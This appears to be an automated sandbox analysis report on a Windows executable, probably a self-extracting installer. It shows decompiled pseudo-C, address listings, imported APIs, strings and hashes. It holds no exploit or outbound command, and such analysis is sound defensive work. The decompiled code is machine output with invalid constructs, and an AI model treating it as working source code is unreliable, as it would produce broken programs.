											 *(__ebp - 0x1844) = __cx;
											__edx = 0x3ff;
											__ecx = __ebp - 0x1842;
											goto L157;
										}
										_push(0x2f);
										_pop(__eax);
										__eflags = __di - __ax;
										if(__di != __ax) {
											goto L159;
										}
										goto L149;
										L159:
										__esi =  &(__esi->i);
										__eax = __esi->i & 0x0000ffff;
										__edi = __esi->i & 0x0000ffff;
										__eflags = __ax;
									} while (__ax != 0);
									__esi = 0x800;
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										 *__ebx = __ax;
									}
									goto L163;
								} else {
									__ebp - 0x19892 = __ebp - 0x688c;
									E00B70602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
									_push(__ebx);
									_push(__ebp - 0x688a);
									__eax = E00B822C6(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x1844 = E00B70602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
									}
									L163:
									__eflags =  *((short*)(__ebp - 0x11894));
									if( *((short*)(__ebp - 0x11894)) != 0) {
										__ebp - 0x9894 = __ebp - 0x11894;
										__eax = E00B6B6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
									}
									__ebp - 0xb894 = __ebp - 0x688c;
									__eax = E00B6B6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
									__eflags =  *(__ebp - 0x2844);
									if(__eflags == 0) {
										__ebp - 0x2844 = E00B7B425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
									}
									__ebp - 0x2844 = E00B6B690(__eflags, __ebp - 0x2844, __esi);
									__eflags =  *((short*)(__ebp - 0x17894));
									if(__eflags != 0) {
										__ebp - 0x17894 = __ebp - 0x2844;
										E00B705DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
										__eax = E00B6B690(__eflags, __ebp - 0x2844, __esi);
									}
									__ebp - 0x2844 = __ebp - 0xc894;
									__eax = E00B70602(__ebp - 0xc894, __ebp - 0x2844, __esi);
									__eflags =  *(__ebp - 0x13894);
									__eax = __ebp - 0x13894;
									if(__eflags == 0) {
										__eax = __ebp - 0x19894;
									}
									__ebp - 0x2844 = E00B705DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
									__eax = __ebp - 0x2844;
									__eflags = E00B6B92D(__ebp - 0x2844);
									if(__eflags == 0) {
										L173:
										__ebp - 0x2844 = E00B705DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
										goto L174;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L174:
											__ebx = 0;
											__ebp - 0x2844 = E00B6A0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
											__ebp - 0xb894 = __ebp - 0xa894;
											E00B70602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
											__eax = E00B6C2E4(__eflags, __ebp - 0xa894);
											__esi =  *(__ebp - 0x1844) & 0x0000ffff;
											__eax = __ebp - 0x1844;
											__edx =  *(__ebp - 0x9894) & 0x0000ffff;
											__edi = __ebp - 0xa894;
											__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
											__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
											asm("sbb esi, esi");
											__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
											__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
											__eax = __ebp - 0x9894;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
											__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
											__eax = __ebp - 0x15894;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
											 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
											asm("sbb eax, eax");
											 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
											__ebp - 0xb894 = E00B7A48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
											__eflags =  *(__ebp - 0xc894) - __bx;
											if( *(__ebp - 0xc894) != __bx) {
												_push(0);
												__eax = __ebp - 0xc894;
												_push(__ebp - 0xc894);
												_push(5);
												_push(0x1000);
												__eax =  *0xbc308c();
											}
											goto L178;
										}
										goto L173;
									}
								}
							case 0xa:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0xbaa470 = 1;
								}
								goto L178;
							case 0xb:
								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
								__eax = E00B879E9( *(__ebp - 0x588c) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0xba8461 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0xba8462 = 1;
									} else {
										__eax = 0;
										 *0xba8461 = __al;
										 *0xba8462 = __al;
									}
								}
								goto L178;
							case 0xc:
								 *0xbb7b7a = 1;
								__eax = __eax + 0xbb7b7a;
								_t125 = __esi + 0x39;
								 *_t125 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t125;
								__ebp = 0xffffa774;
								if( *_t125 != 0) {
									_t127 = __ebp - 0x588c; // 0xffff4ee8
									__eax = _t127;
									 *0xb9e728 = E00B71FA7(_t127);
								}
								goto L178;
						}
						L4:
						_push(0x1000);
						_push(_t311);
						_push(_t237);
						_t237 = E00B7AF98();
						_t311 = _t311 + 0x2000;
						_t308 = _t308 - 1;
						if(_t308 != 0) {
							goto L4;
						} else {
							_t312 = _t308;
							goto L6;
						}
						L178:
						_push(0x1000);
						_t221 = _t316 - 0x15; // 0xffffa75f
						_t222 = _t316 - 0xd; // 0xffffa767
						_t223 = _t316 - 0x588c; // 0xffff4ee8
						_t224 = _t316 - 0xf894; // 0xfffeaee0
						_push( *((intOrPtr*)(_t316 + 0xc)));
						_t232 = E00B7B314(_t308, _t316);
						_t293 =  *((intOrPtr*)(_t316 + 0x10));
						 *((intOrPtr*)(_t316 + 0xc)) = _t232;
					} while (_t232 != 0);
				}
			}

0x00b7c744
0x00b7c74e
0x00b7c757
0x00b7d40d
0x00b7d410
0x00b7d418
0x00b7d418
0x00b7c75d
0x00b7c765
0x00b7c769
0x00b7c770
0x00b7c777
0x00b7c778
0x00b7c77b
0x00b7c780
0x00b7c782
0x00b7c787
0x00b7c78e
0x00b7c792
0x00b7c793
0x00b7c795
0x00b7c79b
0x00b7c7a1
0x00b7c7a1
0x00000000
0x00b7c7bb
0x00b7c7d2
0x00b7c7d6
0x00000000
0x00b7c7d8
0x00000000
0x00b7c7d8
0x00b7c7d6
0x00b7c7e0
0x00000000
0x00000000
0x00b7c7e6
0x00000000
0x00b7c7ed
0x00b7c7f0
0x00b7c7f6
0x00b7c803
0x00b7c829
0x00b7c83d
0x00b7c840
0x00b7c84b
0x00b7c98f
0x00b7c98f
0x00b7c99d
0x00b7c9a2
0x00b7c9a4
0x00000000
0x00000000
0x00b7c85d
0x00b7c863
0x00b7c869
0x00b7c90f
0x00b7c916
0x00b7c91c
0x00b7c91f
0x00000000
0x00000000
0x00b7c928
0x00b7c92e
0x00b7c930
0x00000000
0x00b7c932
0x00b7c932
0x00b7c934
0x00b7c935
0x00b7c939
0x00b7c94d
0x00b7c952
0x00b7c95c
0x00b7c962
0x00b7c965
0x00b7c937
0x00b7c937
0x00b7c938
0x00000000
0x00b7c967
0x00b7c975
0x00b7c97b
0x00b7c97d
0x00b7c989
0x00b7c989
0x00000000
0x00b7c97d
0x00b7c965
0x00b7c930
0x00b7c87e
0x00b7c88b
0x00b7c89c
0x00b7c89f
0x00b7c8a2
0x00b7c8b5
0x00b7c8bc
0x00b7c8c1
0x00b7c8c3
0x00000000
0x00000000
0x00b7c8c9
0x00b7c8d0
0x00b7c8d5
0x00b7c8da
0x00b7c8e6
0x00b7c8eb
0x00b7c8ee
0x00b7c8f5
0x00b7c8f7
0x00b7c8f8
0x00b7c902
0x00b7c908
0x00b7c909
0x00000000
0x00b7c909
0x00b7c8ab
0x00b7c8b1
0x00b7c8b3
0x00000000
0x00000000
0x00000000
0x00b7c8b3
0x00b7c9aa
0x00b7c9b4
0x00b7c9b4
0x00000000
0x00000000
0x00b7c9be
0x00b7c9c0
0x00b7ca13
0x00b7ca18
0x00b7ca21
0x00b7ca22
0x00b7ca28
0x00b7ca2d
0x00b7ca30
0x00b7ca32
0x00b7ca44
0x00b7ca49
0x00b7ca4a
0x00b7ca4a
0x00b7ca4b
0x00b7ca4d
0x00b7ca54
0x00b7ca59
0x00b7ca4d
0x00000000
0x00000000
0x00b7ca5f
0x00b7ca61
0x00b7ca71
0x00b7ca71
0x00000000
0x00000000
0x00b7ca7c
0x00b7ca7e
0x00000000
0x00000000
0x00b7ca84
0x00b7ca8b
0x00000000
0x00000000
0x00b7ca91
0x00b7ca93
0x00b7ca99
0x00b7ca9b
0x00b7caa2
0x00b7caa3
0x00b7caaa
0x00b7caac
0x00b7caac
0x00b7cab3
0x00b7cab8
0x00b7cabe
0x00b7cac0
0x00000000
0x00b7cac6
0x00b7cac6
0x00b7cac9
0x00b7cacb
0x00b7cacc
0x00b7cacf
0x00b7caf8
0x00b7cafb
0x00b7cbe0
0x00b7cbe9
0x00b7cbee
0x00b7cbee
0x00b7cbf0
0x00b7cbf0
0x00b7cbf2
0x00b7cbf4
0x00b7cbfb
0x00b7cc00
0x00b7cc01
0x00b7cc02
0x00b7cc04
0x00b7cc06
0x00b7cc0a
0x00b7cc0c
0x00b7cc0c
0x00b7cc0e
0x00b7cc0e
0x00b7cc0a
0x00b7cc12
0x00b7cc18
0x00b7cc25
0x00b7cc2c
0x00b7cc3c
0x00b7cc46
0x00b7cc54
0x00b7cc5a
0x00b7cc62
0x00b7cc67
0x00b7cc68
0x00b7cc69
0x00b7cc6b
0x00b7cc7f
0x00b7cc7f
0x00000000
0x00b7cc6b
0x00b7cb01
0x00b7cb01
0x00b7cb04
0x00b7cb11
0x00b7cb11
0x00b7cb14
0x00b7cb16
0x00b7cb17
0x00b7cb19
0x00b7cb1a
0x00b7cb1f
0x00b7cb24
0x00b7cb2a
0x00b7cb2c
0x00b7cb2e
0x00b7cb31
0x00b7cb38
0x00b7cb39
0x00b7cb3f
0x00b7cb40
0x00b7cb43
0x00b7cb44
0x00b7cb45
0x00b7cb4a
0x00b7cb4d
0x00b7cb53
0x00b7cb5c
0x00b7cb5f
0x00b7cb64
0x00b7cb66
0x00b7cb68
0x00b7cb6a
0x00b7cb6a
0x00b7cb6c
0x00b7cb6c
0x00b7cb6e
0x00b7cb6e
0x00b7cb76
0x00b7cb7d
0x00b7cb7f
0x00b7cb86
0x00b7cb8c
0x00b7cb8e
0x00b7cb8f
0x00b7cb97
0x00b7cba6
0x00b7cba6
0x00b7cb97
0x00b7cbb1
0x00b7cbb3
0x00b7cbc2
0x00b7cbc8
0x00b7cbce
0x00b7cbd9
0x00b7cbd9
0x00000000
0x00b7cbce
0x00b7cb06
0x00b7cb0b
0x00000000
0x00000000
0x00000000
0x00b7cb0b
0x00b7cad1
0x00b7cad5
0x00000000
0x00000000
0x00b7cad7
0x00b7cada
0x00b7cadc
0x00b7cadf
0x00000000
0x00b7cae5
0x00b7caee
0x00000000
0x00b7caee
0x00b7cadf
0x00000000
0x00b7cc8a
0x00b7cc8b
0x00b7cc90
0x00b7cc92
0x00b7cc95
0x00b7cc95
0x00000000
0x00b7cccb
0x00b7ccd2
0x00b7ccd4
0x00b7ccd4
0x00b7ccd6
0x00b7cd05
0x00b7cd05
0x00b7cd0b
0x00000000
0x00b7cd0b
0x00b7ccd8
0x00b7ccd8
0x00b7ccdb
0x00b7ccf4
0x00b7ccfa
0x00b7ccfa
0x00000000
0x00b7ccfa
0x00b7ccdd
0x00b7ccdd
0x00b7cce0
0x00000000
0x00000000
0x00b7cce2
0x00b7cce2
0x00b7cce5
0x00000000
0x00000000
0x00b7cceb
0x00000000
0x00000000
0x00b7cd58
0x00b7cd5a
0x00b7cd61
0x00b7cd62
0x00b7cd68
0x00b7cd70
0x00b7cd72
0x00b7cd75
0x00b7ce25
0x00b7ce25
0x00b7ce29
0x00b7ce38
0x00b7ce3c
0x00000000
0x00000000
0x00b7ce42
0x00b7ce45
0x00000000
0x00000000
0x00b7ce4b
0x00b7ce4b
0x00b7ce4d
0x00b7ce4e
0x00b7ce4e
0x00b7ce4f
0x00b7ce50
0x00b7ce53
0x00000000
0x00b7ce53
0x00b7ce2b
0x00b7ce2e
0x00000000
0x00000000
0x00b7ce34
0x00000000
0x00b7ce34
0x00b7cd7b
0x00b7cd81
0x00b7cd83
0x00b7cd84
0x00b7cd89
0x00b7cd8a
0x00b7cd8b
0x00b7cd8d
0x00b7ce22
0x00b7ce22
0x00000000
0x00b7ce22
0x00b7cd93
0x00b7cd93
0x00b7cd96
0x00b7cd99
0x00b7cd9b
0x00b7cd9e
0x00b7cda4
0x00b7cda6
0x00b7cda7
0x00b7cdad
0x00b7cdae
0x00b7cdb3
0x00b7cdb6
0x00b7cdb8
0x00000000
0x00000000
0x00b7cdba
0x00b7cdbc
0x00b7cdbc
0x00b7cdc4
0x00000000
0x00000000
0x00b7cdcb
0x00b7cdd2
0x00b7cdd7
0x00b7cdde
0x00b7cde0
0x00b7cde2
0x00b7cde9
0x00b7cdee
0x00b7cdf0
0x00b7cdf2
0x00b7cdf4
0x00b7cdf4
0x00b7cdfa
0x00b7ce01
0x00b7ce06
0x00b7ce08
0x00b7ce0a
0x00b7ce0c
0x00b7ce0c
0x00b7ce0d
0x00b7ce0f
0x00b7ce15
0x00b7ce16
0x00b7ce1c
0x00b7ce1e
0x00b7ce20
0x00000000
0x00000000
0x00000000
0x00000000
0x00b7ce20
0x00000000
0x00000000
0x00b7ce87
0x00b7ce8a
0x00b7d009
0x00b7d00c
0x00b7d012
0x00b7d018
0x00b7d01a
0x00b7d01a
0x00b7d024
0x00b7d024
0x00000000
0x00b7d00c
0x00b7ce90
0x00b7ce96
0x00b7cea4
0x00b7ceab
0x00b7ceb0
0x00b7ceb2
0x00b7ceb4
0x00b7ceb9
0x00b7ceb9
0x00b7ced1
0x00b7cede
0x00b7cee3
0x00b7cee5
0x00000000
0x00000000
0x00b7ceb7
0x00b7ceb7
0x00b7ceb8
0x00b7ceb8
0x00b7cef1
0x00b7cef7
0x00b7cefe
0x00000000
0x00000000
0x00b7cf04
0x00b7cf0a
0x00000000
0x00000000
0x00b7cf10
0x00b7cf12
0x00b7cf19
0x00b7cf1f
0x00b7cf21
0x00b7cf22
0x00b7cf27
0x00b7cf28
0x00b7cf29
0x00b7cf2b
0x00b7cf7b
0x00b7cf7b
0x00b7cf82
0x00b7cf90
0x00b7cfa1
0x00b7cfaf
0x00b7cfaf
0x00b7cfbb
0x00b7cfc0
0x00b7cfc2
0x00b7cfd2
0x00b7cfdc
0x00b7cfe1
0x00b7cfe4
0x00b7cfef
0x00b7cff1
0x00b7cff8
0x00b7cffe
0x00b7cffe
0x00000000
0x00b7cfe4
0x00b7cf2d
0x00b7cf34
0x00b7cf36
0x00b7cf39
0x00000000
0x00000000
0x00b7cf3b
0x00b7cf3e
0x00b7cf3e
0x00b7cf42
0x00000000
0x00000000
0x00b7cf44
0x00b7cf4c
0x00b7cf4d
0x00b7cf4f
0x00b7cf52
0x00000000
0x00000000
0x00000000
0x00b7cf54
0x00b7cf61
0x00b7cf6c
0x00b7cf71
0x00b7cf71
0x00b7cf73
0x00000000
0x00000000
0x00b7d030
0x00b7d033
0x00b7d035
0x00b7d03c
0x00b7d03e
0x00b7d044
0x00b7d045
0x00b7d04a
0x00b7d04b
0x00b7d04b
0x00b7d050
0x00b7d053
0x00b7d059
0x00b7d059
0x00b7d05e
0x00000000
0x00000000
0x00b7d06a
0x00b7d06d
0x00000000
0x00000000
0x00b7d073
0x00b7d075
0x00b7d07c
0x00b7d084
0x00b7d08a
0x00b7d08d
0x00b7d0b0
0x00b7d0b7
0x00b7d08f
0x00b7d08f
0x00b7d092
0x00b7d0a2
0x00b7d0a9
0x00b7d094
0x00b7d094
0x00b7d09b
0x00b7d09b
0x00b7d092
0x00b7d0bc
0x00b7d0ca
0x00b7d0cf
0x00b7d0d1
0x00b7d0d8
0x00b7d0e7
0x00b7d0ee
0x00b7d0f3
0x00b7d0f5
0x00b7d0f6
0x00b7d0fd
0x00b7d150
0x00b7d155
0x00b7d157
0x00000000
0x00000000
0x00b7d15d
0x00b7d164
0x00b7d16a
0x00b7d16c
0x00b7d16f
0x00b7d221
0x00000000
0x00b7d221
0x00b7d175
0x00b7d178
0x00b7d178
0x00b7d17a
0x00b7d17b
0x00b7d17e
0x00b7d188
0x00b7d188
0x00b7d18a
0x00b7d194
0x00b7d199
0x00b7d19b
0x00b7d1fd
0x00b7d1fd
0x00000000
0x00b7d1fd
0x00b7d1a4
0x00b7d1aa
0x00b7d1af
0x00b7d1b1
0x00000000
0x00000000
0x00b7d1b3
0x00b7d1b5
0x00b7d1b6
0x00b7d1b9
0x00b7d1bb
0x00b7d1be
0x00b7d1d4
0x00b7d1d6
0x00b7d1d8
0x00b7d1de
0x00b7d1de
0x00b7d1e1
0x00000000
0x00000000
0x00b7d1db
0x00b7d1db
0x00b7d1db
0x00b7d1e3
0x00b7d1e9
0x00b7d1eb
0x00b7d1f0
0x00b7d1f3
0x00b7d1f8
0x00000000
0x00b7d1f8
0x00b7d1c0
0x00b7d1c7
0x00b7d1cc
0x00000000
0x00b7d1cc
0x00b7d180
0x00b7d182
0x00b7d183
0x00b7d186
0x00000000
0x00000000
0x00000000
0x00b7d200
0x00b7d200
0x00b7d203
0x00b7d206
0x00b7d208
0x00b7d208
0x00b7d211
0x00b7d216
0x00b7d218
0x00b7d21a
0x00b7d21c
0x00b7d21c
0x00000000
0x00b7d0ff
0x00b7d107
0x00b7d113
0x00b7d119
0x00b7d11a
0x00b7d11b
0x00b7d120
0x00b7d121
0x00b7d122
0x00b7d124
0x00b7d12a
0x00b7d12c
0x00b7d13f
0x00b7d13f
0x00b7d226
0x00b7d226
0x00b7d22e
0x00b7d238
0x00b7d23f
0x00b7d23f
0x00b7d24c
0x00b7d253
0x00b7d258
0x00b7d260
0x00b7d26c
0x00b7d26c
0x00b7d279
0x00b7d27e
0x00b7d286
0x00b7d290
0x00b7d29d
0x00b7d2a4
0x00b7d2a4
0x00b7d2b1
0x00b7d2b8
0x00b7d2bd
0x00b7d2c5
0x00b7d2cb
0x00b7d2cd
0x00b7d2cd
0x00b7d2e2
0x00b7d2e7
0x00b7d2f3
0x00b7d2f5
0x00b7d306
0x00b7d313
0x00000000
0x00b7d2f7
0x00b7d302
0x00b7d304
0x00b7d318
0x00b7d318
0x00b7d324
0x00b7d331
0x00b7d33d
0x00b7d344
0x00b7d349
0x00b7d350
0x00b7d356
0x00b7d35d
0x00b7d363
0x00b7d36a
0x00b7d36c
0x00b7d36e
0x00b7d370
0x00b7d372
0x00b7d378
0x00b7d37a
0x00b7d37c
0x00b7d37e
0x00b7d384
0x00b7d386
0x00b7d390
0x00b7d393
0x00b7d399
0x00b7d3a8
0x00b7d3ad
0x00b7d3b4
0x00b7d3b6
0x00b7d3b7
0x00b7d3bd
0x00b7d3be
0x00b7d3c0
0x00b7d3c5
0x00b7d3c5
0x00000000
0x00b7d3b4
0x00000000
0x00b7d304
0x00b7d2f5
0x00000000
0x00b7d3cd
0x00b7d3d0
0x00b7d3d2
0x00b7d3d2
0x00000000
0x00000000
0x00b7cd17
0x00b7cd1f
0x00b7cd25
0x00b7cd28
0x00b7cd4c
0x00b7cd2a
0x00b7cd2a
0x00b7cd2d
0x00b7cd40
0x00b7cd2f
0x00b7cd2f
0x00b7cd31
0x00b7cd36
0x00b7cd36
0x00b7cd2d
0x00000000
0x00000000
0x00b7ce5d
0x00b7ce5e
0x00b7ce63
0x00b7ce63
0x00b7ce63
0x00b7ce66
0x00b7ce6b
0x00b7ce71
0x00b7ce71
0x00b7ce7d
0x00b7ce7d
0x00000000
0x00000000
0x00b7c7a2
0x00b7c7a2
0x00b7c7a7
0x00b7c7a8
0x00b7c7a9
0x00b7c7ae
0x00b7c7b4
0x00b7c7b7
0x00000000
0x00b7c7b9
0x00b7c7b9
0x00000000
0x00b7c7b9
0x00b7d3d9
0x00b7d3d9
0x00b7d3de
0x00b7d3e2
0x00b7d3e6
0x00b7d3ed
0x00b7d3f4
0x00b7d3f7
0x00b7d3fc
0x00b7d3ff
0x00b7d402
0x00b7d40c

APIs

__EH_prolog.LIBCMT ref: 00B7C744

Part of subcall function 00B7B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B7B3FB

_wcslen.LIBCMT ref: 00B7CA0A
_wcslen.LIBCMT ref: 00B7CA13
SetWindowTextW.USER32(?,?), ref: 00B7CA71
_wcslen.LIBCMT ref: 00B7CAB3
_wcsrchr.LIBVCRUNTIME ref: 00B7CBFB
GetDlgItem.USER32(?,00000066), ref: 00B7CC36
SetWindowTextW.USER32(00000000,?), ref: 00B7CC46
SendMessageW.USER32(00000000,00000143,00000000,00BAA472), ref: 00B7CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B7CC7F

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00B7CB1A
%s.%d.tmp, xrefs: 00B7C940
ProgramFilesDir, xrefs: 00B7CB45
<br>, xrefs: 00B7C9D4

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 12e14377229e7548a811e6afa6cfbebe650e1f90eb73da2dd879e29f0fec24a0
Instruction ID: 128adc4822e3de19afda24142324747d60b39259f6b17cce624e5c1f19df0952
Opcode Fuzzy Hash: 12e14377229e7548a811e6afa6cfbebe650e1f90eb73da2dd879e29f0fec24a0
Instruction Fuzzy Hash: E4E14172900119AADF25EBA0DD85EEE77FCEB04750F4080EAF619E7150EF749E848B64

Uniqueness

Uniqueness Score: -1.00%

Function 00B6DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B6DA67(char* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t245;
				void* _t246;
				WCHAR* _t247;
				void* _t252;
				unsigned int _t258;
				signed int _t264;
				signed int _t268;
				void* _t279;
				signed short* _t283;
				void* _t284;
				void* _t290;
				signed short* _t294;
				void* _t295;
				signed int _t299;
				signed int _t303;
				signed int _t318;
				signed int _t322;
				signed int _t324;
				signed int _t326;
				signed int _t333;
				char* _t334;
				signed int _t338;
				short _t341;
				void* _t342;
				signed int _t346;
				char* _t348;
				char* _t350;
				char* _t355;
				void* _t358;
				void* _t360;
				void* _t363;
				signed int _t372;
				char* _t374;
				unsigned int _t385;
				unsigned int _t389;
				signed int _t392;
				signed int _t397;
				signed int _t399;
				void* _t400;
				signed int _t401;
				void* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				char* _t421;
				signed int _t424;
				signed int _t425;
				void* _t430;
				char* _t434;
				signed int _t443;
				signed int _t444;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				char* _t451;
				signed int _t453;
				signed int _t455;
				void* _t456;
				intOrPtr* _t459;
				signed int _t461;
				signed int _t462;
				char* _t463;
				signed int _t466;
				signed int _t467;
				char** _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				void* _t477;
				void* _t478;

				_t443 = __edx;
				_t471 = _t470 - 0x54;
				E00B7EB78(0xb929bd, _t468);
				E00B7EC50(0x41fc);
				_t245 = 0x5c;
				_push(_t245);
				_push(_t468[0x18]);
				_t459 = __ecx;
				_t468[4] = _t245;
				_t468[0xe] = __ecx;
				_t246 = E00B822C6(__ecx);
				_t372 = 0;
				_t475 = _t246;
				_t247 = _t468 - 0x31d0;
				if(_t246 != 0) {
					E00B70602(_t247, _t468[0x18], 0x800);
				} else {
					GetModuleFileNameW(0, _t247, 0x800);
					 *((short*)(E00B6C29A(_t475, _t468 - 0x31d0))) = 0;
					E00B705DA(_t475, _t468 - 0x31d0, _t468[0x18], 0x800);
				}
				E00B69556(_t468 - 0x4208);
				_push(4);
				 *(_t468 - 4) = _t372;
				_push(_t468 - 0x31d0);
				if(E00B698E0(_t468 - 0x4208, _t459) == 0) {
					L125:
					_t252 = E00B6959A(_t468 - 0x4208); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t468 - 0xc));
					__eflags =  &(_t468[0x16]);
					return _t252;
				} else {
					_t447 = _t372;
					_t477 =  *0xb9e720 - _t447; // 0x64
					if(_t477 <= 0) {
						L7:
						E00B86310(_t372,  *_t459,  *((intOrPtr*)(_t459 + 4)), 4, E00B6D6E0);
						E00B86310(_t372,  *((intOrPtr*)(_t459 + 0x14)),  *((intOrPtr*)(_t459 + 0x18)), 4, E00B6D640);
						_t473 = _t471 + 0x20;
						_t468[0x14] = _t372;
						_t448 = _t447 | 0xffffffff;
						_t468[0xf] = _t372;
						while(_t448 == 0xffffffff) {
							_t348 = E00B69E80(_t468 - 0x4208); // executed
							_t468[0x12] = _t348;
							_t350 = E00B69BD0(_t468 - 0x4208, _t443, _t468 - 0x21d0, 0x2000);
							_t468[0x11] = _t350;
							_t467 = _t372;
							_t24 = _t350 - 0x10; // -16
							_t434 = _t24;
							_t468[0xa] = _t434;
							if(_t434 < 0) {
								L25:
								_t351 = _t468[0x12];
								L26:
								E00B69D70(_t468 - 0x4208, _t468,  &(_t351[ &(_t468[0x11][0xfffffffffffffff0])]), _t372, _t372);
								_t355 =  &(_t468[0xf][1]);
								_t468[0xf] = _t355;
								__eflags = _t355 - 0x100;
								if(_t355 < 0x100) {
									continue;
								}
								__eflags = _t448 - 0xffffffff;
								if(_t448 == 0xffffffff) {
									goto L125;
								}
								break;
							} else {
								goto L10;
							}
							L12:
							_t363 = E00B86740(_t468 - 0x21ce + _t467, "*messages***", 0xb);
							_t473 = _t473 + 0xc;
							if(_t363 == 0) {
								L24:
								_t351 = _t468[0x12];
								_t448 =  &(_t468[0x12][_t467]);
								goto L26;
							} else {
								_t350 = _t468[0x11];
							}
							L14:
							_t443 = 0x2a;
							if( *((intOrPtr*)(_t468 + _t467 - 0x21d0)) != _t443) {
								L18:
								if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x52 ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x61) {
									L21:
									_t467 = _t467 + 1;
									if(_t467 > _t468[0xa]) {
										goto L25;
									} else {
										_t350 = _t468[0x11];
										L10:
										if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x2a ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x2a) {
											goto L14;
										} else {
											goto L12;
										}
									}
								} else {
									_t358 = E00B86740(_t468 - 0x21ce + _t467, 0xb939c8, 4);
									_t473 = _t473 + 0xc;
									if(_t358 == 0) {
										goto L125;
									}
									goto L21;
								}
							}
							_t439 = _t468 - 0x21cc + _t467;
							if( *((intOrPtr*)(_t468 - 0x21cc + _t467 - 2)) == _t443 && _t467 <=  &(_t350[0xffffffffffffffe0])) {
								_t360 = E00B86088(_t439, L"*messages***", 0xb);
								_t473 = _t473 + 0xc;
								if(_t360 == 0) {
									_t468[0x14] = 1;
									goto L24;
								}
							}
							goto L18;
						}
						asm("cdq");
						E00B69D70(_t468 - 0x4208, _t468, _t448, _t443, _t372);
						_push(0x200002);
						_t461 = E00B83E33(_t468 - 0x4208);
						_t468[0x13] = _t461;
						__eflags = _t461;
						if(_t461 == 0) {
							goto L125;
						}
						_t258 = E00B69BD0(_t468 - 0x4208, _t443, _t461, 0x200000);
						__eflags = _t468[0x14];
						_t385 = _t258;
						_t468[0x12] = _t385;
						if(_t468[0x14] == 0) {
							_push(2 + _t385 * 2);
							_t449 = E00B83E33(_t385);
							__eflags = _t449;
							if(_t449 == 0) {
								goto L125;
							}
							_t468[0x12][_t461] = _t372;
							E00B71B84(_t461, _t449,  &(_t468[0x12][1]));
							L00B83E2E(_t461);
							_t389 = _t468[0x12];
							_t461 = _t449;
							_t468[0x13] = _t461;
							L33:
							_t264 = 0x100000;
							__eflags = _t389 - 0x100000;
							if(_t389 <= 0x100000) {
								_t264 = _t389;
							}
							 *((short*)(_t461 + _t264 * 2)) = 0;
							E00B705A7(_t468 - 0x108, 0xb939d0, 0x64);
							_push(0x20002);
							_t450 = E00B83E33(0);
							_t468[0x11] = _t450;
							__eflags = _t450;
							if(_t450 != 0) {
